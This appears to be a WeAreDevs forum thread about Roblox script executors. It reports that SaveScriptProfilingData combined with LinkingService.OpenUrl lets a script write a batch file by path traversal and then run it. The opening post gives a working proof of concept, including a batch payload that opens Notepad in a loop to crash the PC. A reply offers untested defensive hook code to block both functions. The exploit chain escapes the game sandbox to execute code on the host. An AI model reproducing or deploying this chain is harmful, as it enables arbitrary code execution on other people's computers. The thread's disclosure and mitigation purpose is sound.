Categories > WeAreDevs > Suggestions >

LinkingService: Vulnerable

New Reply

Posts: 1

Threads: 1

Joined: Sep, 2024

Reputation: 0

Posted

Block LinkingService

And might AvatarEditorService

local LinkingService = gameGetService(LinkingService)
local ScriptContext = gameGetService(ScriptContext)

local scriptContent = [[]]

local payload = ScriptContextSaveScriptProfilingData(scriptContent, ........test.bat)
LinkingServiceOpenUrl(payload)

here is an example that opens notepads repeatedly and crashes your pc

local LinkingService = gameGetService(LinkingService)
local ScriptContext = gameGetService(ScriptContext)

local scriptContent = [[@echo off
top
START %SystemRoot%system32notepad.exe
GOTO top
]]

local payload = ScriptContextSaveScriptProfilingData(scriptContent, ........test.bat)
LinkingServiceOpenUrl(payload)
  • 0

  • Comment

RealNickk

nick / reversed-coffee

vip

Posts: 21

Threads: 3

Joined: Mar, 2023

Reputation: 10

Replied

Well until this is patched you MIGHT be able to hook these functions in the meantime to prevent their usage.

 

Here's some code I wrote that can achieve that but I did not test it, so do not consider it foolproof. Been about a year since I wrote anything related to Lua. Also I forgot if this handles namecalling; I think it does, but it would be worth testing.

local scriptContext = game:GetService("ScriptContext")
local linkingService = game:GetService("LinkingService")

local function fnHook(self, cb, ...)
    local fnName = debug.info(cb, "n")
    warn(string.format("Function call to '%s' was blocked.", fnName))

    -- if you want to yield the thread that called the function, uncomment below
    -- this will error if called under a metamethod or C function; exercise caution
    -- coroutine.yield()
end

local function delegate(fn, ...)
    local packed = {...}
    return function(self, ...) return fn(self, unpack(packed), ...) end
end

local sspd = scriptContext.SaveScriptProfilingData
hookfunction(sspd, delegate(fnHook, sspd))

local lsou = linkingService.OpenUrl
hookfunction(lsou, delegate(fnHook, lsou))
  • 0

  • Comment

Used to be involved with game hacking, now I'm involved in cybersecurity. https://reversed.coffee/blog

Login to unlock the reply editor

Add your reply

Users viewing this thread:

( Members: 0, Guests: 1, Total: 1 )